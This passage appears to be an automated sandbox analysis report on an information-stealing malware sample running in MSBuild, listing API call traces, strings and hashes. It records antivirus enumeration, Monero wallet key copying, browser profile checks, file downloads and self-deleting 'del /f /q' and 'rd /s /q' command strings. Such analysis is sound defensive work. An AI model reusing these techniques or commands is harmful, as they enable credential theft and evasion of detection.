                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                      • String ID: GET$\xA
                                                                                                                                                                                                                      • API String ID: 442264750-571280152
                                                                                                                                                                                                                      • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                                                                      • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                                                                        • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                                                                                        • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                      • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                      • API String ID: 4288110179-315474579
                                                                                                                                                                                                                      • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                                                                      • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                                                                        • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1553874529-0
                                                                                                                                                                                                                      • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                                                                      • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411466
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                      • String ID: - $%s\%s$?
                                                                                                                                                                                                                      • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                      • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                                                                      • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418296
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004182A5
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418465
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00418477
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • " & exit, xrefs: 004183DA
                                                                                                                                                                                                                      • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                                                                                                                      • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                                                                                                                      • " & exit, xrefs: 00418389
                                                                                                                                                                                                                      • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                      • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                      • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                      • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                                                                                      • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                      • String ID: wA$:\$C$QuBi
                                                                                                                                                                                                                      • API String ID: 1856320939-1441494722
                                                                                                                                                                                                                      • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                                                                      • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                      • String ID: <+A
                                                                                                                                                                                                                      • API String ID: 2507841554-2778417545
                                                                                                                                                                                                                      • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                                                                      • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                      • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                      • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                                                                      • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                      • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                      • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                                                                      • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                                                                        • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                        • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                        • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
